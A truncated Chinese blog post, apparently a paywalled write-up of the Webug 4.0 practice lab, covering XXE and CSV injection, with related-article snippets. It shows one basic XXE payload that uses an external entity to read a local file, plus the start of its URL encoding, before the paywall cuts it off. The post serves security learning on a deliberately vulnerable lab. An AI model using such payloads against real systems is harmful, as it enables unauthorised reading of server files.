Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入

最新推荐文章于 2024-06-06 09:50:35 发布
最新推荐文章于 2024-06-06 09:50:35 发布
阅读量818 收藏 2
点赞数 3
分类专栏: webug靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZXT2804567059/article/details/113929141
版权
本文介绍了Webug4.0靶场中关于XXE注入和CSV注入的实战经验。在XXE部分,通过基础的XML实体注入读取了本地文件获取flag。在CSV注入环节,讨论了如何利用恶意公式执行代码,当CSV文件在Excel中打开时,可能会触发潜在的安全风险。
摘要由CSDN通过智能技术生成

一、xxe注入

这道题应该是XXE漏洞最基础的任意文件读取

打开是一个输入框


在C盘构造一个flag。别问我为啥,为也不知道


bp抓个包


随便输入个什么都有回显,应该是基础的XXE注入


这是一段读取文件的xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY B SYSTEM "file:///c:/1.txt">
]>
<xml>
    <xxe>&B;</xxe>
</xml>   

由于存在换行,所以转化为URL编码:%3C%3F%78%6D%6C%20%76%65%72%73%69%6F%6E%3D%22%31%2E%30%22%3F%3E%0D%0A%3C%21%44%4F%

最低0.47元/天 解锁文章
{Yasso}
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
自搭XXE靶场通关记录
weixin_55843787的博客
04-19 244
XXE
webug4.0-xxe注入
nex1less的博客
08-28 1502
0x01 xxe基本知识 1.什么是xxe漏洞? xxe就是XML External Entity,也就是XML外部实体注入攻击。 2.xxe漏洞的危害大吗? 大,恶意用户通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 3.xxe漏洞产生原因是什么? 允许引用外部实体时,如php中libxml_disable_entity_loader当...
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
Web 安全之 CSV 注入攻击详解
最新发布
zzz6583zz的博客
06-06 1144
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
iwebsec靶场(XXE漏洞)
果粒程
03-07 808
iwebsec靶场(XXE漏洞)
webug4.0之xxe注入
weixin_50464560的博客
06-05 301
关于xxe漏洞,传送门 -》xxe漏洞详解 1. 页面观察 让我们登录,我们随便输入一个字符如admin,观察页面,出现了xml有关的东西,我们就要怀疑存在xml注入 2. 看是否能解析xml数据 这里我们使用burpsuite截取数据包,更好的观察。将以下的测试语句提交到输入框中,如果程序能输出 “my name is nMask”则说明能都解析xml数据 <?xml ver...
HIN2xxE系列RS-232收发器的原理及应用
12-13
摘要:HIN2xxE系列是由+5V单电源供电的高速RS-232收发电路,符合EIA RS-232C和V.28规范,以电源功耗低为显著特点,广泛应用于ISDN和高速调制解调器,尤其是电池供电系统中。文中主要介绍HIN2xxE系列电路的原理、特性...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
libxml2-2.9.13
07-14
9. **安全性**:libxml2关注安全问题,例如防止XXE(XML外部实体注入)和XEE(XML实体扩展)攻击,通过配置选项可以禁用不安全的功能。 10. **API设计**:libxml2提供了清晰的C语言API,易于理解和使用。此外,它还...
hackerone-reports:HackerOne的最新披露的报告
04-05
所有报告的原始信息都存储在data.csv 。 更新data.csv脚本是用Python 3编写的,并且需要selenium 。 每个脚本都包含一些有关其工作方式的信息。 脚本的运行顺序: fetcher.py filler.py rater.py 排名前100位。按...
Webug4.0 打靶笔记
m0_60716947的博客
05-11 4097
一、Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
Webug4.0-链接注入 CSV注入
baynk的博客
11-27 833
0x00 前言 这两个东西,原来都没怎么注意过名称,又扩展了一些新的知识,不过两篇都没有特别好的去研究,仅当作一次学习记录,以后肯定还会再碰到的。 0x01 链接注入 先看靶场,这么一个链接 这妹纸笑的不错,就是。。。然后换了些参数都没什么变化,但是有一个细节要注意。 不管输入什么这里都会显示出来,于是构造了xss,果然弹框了。感觉和csrf一起使用还是可以的,或者当攻击的跳板平台也是可以的...
利用EXCEL进行XXE攻击
xu84557120的博客
01-18 5287
一、攻击原理 引用(https://xz.aliyun.com/t/3741) 0x00 前言 XML外部实体攻击非常常见,特别是通过基于HTTP的API,我们经常遇到并利用以此通常获得对客户端环境的特权访问。 不常见的是用Excel进行XXE攻击。 0x01 这是什么方式 实际上,与所有post-Office 2007文件格式一样,现代Excel文件实际上只是XML文档的zip文件。这...
(翻译)一种xxe盲打的骚姿势,通过在上传的文件中得到结果
qq_36093477的博客
09-26 2467
背景 在之前的报道中,我们了解了很多关系在访问者浏览器执行代码;反射的xss和储存的xss。此外,我们快速查看配置错误的服务器设置和打开重定向。 今天我们将仔细研究从服务器窃取私人文件。 挑选一个目标 一如既往,我们需要一个好的目标。一个在荷兰的最大的电子商务网站 Bol.com。他们处理我的开放重定向错误报告的方式非常好。快速回复,正确修复并始终向我发送更新。没有麻烦,没有NDA,快乐的语气。公...
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6618
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
pikachu靶场___XXE漏洞教程
qq_41584172的博客
11-11 3438
pikachu靶场___XXE漏洞教程 XXE(XML External Entity Injection)即xml外部实体注入 当程序在解析XML输入时,允许引用外部实体,导致能够引用一个外部恶意文件,可导致执行系统命令、内网端口探测、文件读取,攻击内网服务、dos攻击等。以下用pikachu漏洞靶场进行读取文件的演示。   pikachu靶场下载地址:   https://github.com...
webug4.0xxe注入
07-27
XXE(XML External Entity)注入是一种攻击技术,用于利用应用程序对外部实体的处理不当。通过在用户提供的输入中插入恶意的实体引用,攻击者可以读取本地文件、执行远程请求等。针对这种注入漏洞,应用程序应该对用户输入进行严格的过滤和验证,以避免恶意实体的注入。 关于Webug 4.0的XXE注入漏洞,我不清楚具体的细节和漏洞位置。通常,修补XXE注入漏洞的方法是通过禁用外部实体的解析或限制实体解析的范围。为了更好地保护应用程序免受XXE注入攻击,您可以参考以下几点建议: 1. 输入过滤和验证:对用户输入进行严格的过滤和验证,确保只接受合法的输入。可以使用白名单过滤或正则表达式等技术来限制输入。 2. 禁用外部实体解析:在解析XML时,禁用外部实体的解析。这可以防止恶意实体的注入。 3. 限制实体解析范围:如果应用程序需要解析实体,应该限制解析的范围,只允许解析特定的实体或特定的命名空间。 4. 使用安全的XML解析器:确保使用最新版本的XML解析器,并开启安全配置选项,以防止XXE注入攻击。 请注意,以上建议仅为一般性指导,具体修补漏洞需要根据应用程序和环境的特定情况来确定。建议您在修复漏洞之前,先了解Webug 4.0的文档、漏洞报告或咨询安全专家以获取更准确的信息和解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值